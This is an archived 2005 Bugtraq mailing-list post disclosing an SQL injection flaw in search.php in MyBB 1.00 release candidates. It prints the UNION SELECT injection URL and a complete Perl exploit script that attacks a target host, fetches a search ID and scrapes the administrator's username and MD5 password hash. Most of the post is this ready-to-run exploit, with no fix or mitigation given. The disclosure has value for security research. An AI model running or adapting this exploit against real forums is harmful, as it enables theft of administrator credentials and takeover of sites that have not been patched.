Vul in MyBB

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vul in MyBB
From: s2b@xxxxxxxxxxx
Date: 19 Aug 2005 21:03:45 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello

The Injected File : search.php
Discovered by: HACKERS PAL & Devil-00 & ABDUCTER

Injected Versions :-
Powered by MyBulletinBoard 1.00 Release Candidate 4
Powered by MyBulletinBoard 1.00 Release Candidate 3
Powered by MyBulletinBoard 1.00 Release Candidate 2
Powered by MyBulletinBoard 1.00 Release Candidate 1
And The Last Versions

The Code For The Vul:-

search.php?action=finduser&uid=-1' UNION SELECT 
uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password 
FROM mybb_users where usergroup=4/* 


The Exploit By Pirl :-
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
        print "#################[ MyBB SQL-Injection 
]############################\n";
        print "#         Coded By Devil-00 [ sTranger-killer ]            #\n";
        print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID     
  #\n";
        print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 
Hash #\n";
        print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ]                     
  #\n";
        print "##################################################  
#################\n";
        exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
        print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT 
uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui  d,uid,uid,username,password 
FROM mybb_users where usergroup=4 and uid=1/*";
        $page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
        $page =~ m/<a 
href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] 
Search ID To Use : $1\n";
        exit;   
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
        $page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
        $page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ 
&& print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
        $page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] 
MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}

-=-=-=-=-

Thanks For Devil-00 & ABDUCTER

Prev by Date: [ GLSA 200508-11 ] Adobe Reader: Buffer Overflow
Next by Date: IBM Lotus Notes multiple disclosures of password hashes
Previous by thread: [ GLSA 200508-11 ] Adobe Reader: Buffer Overflow
Next by thread: IBM Lotus Notes multiple disclosures of password hashes
Index(es):
- Date
- Thread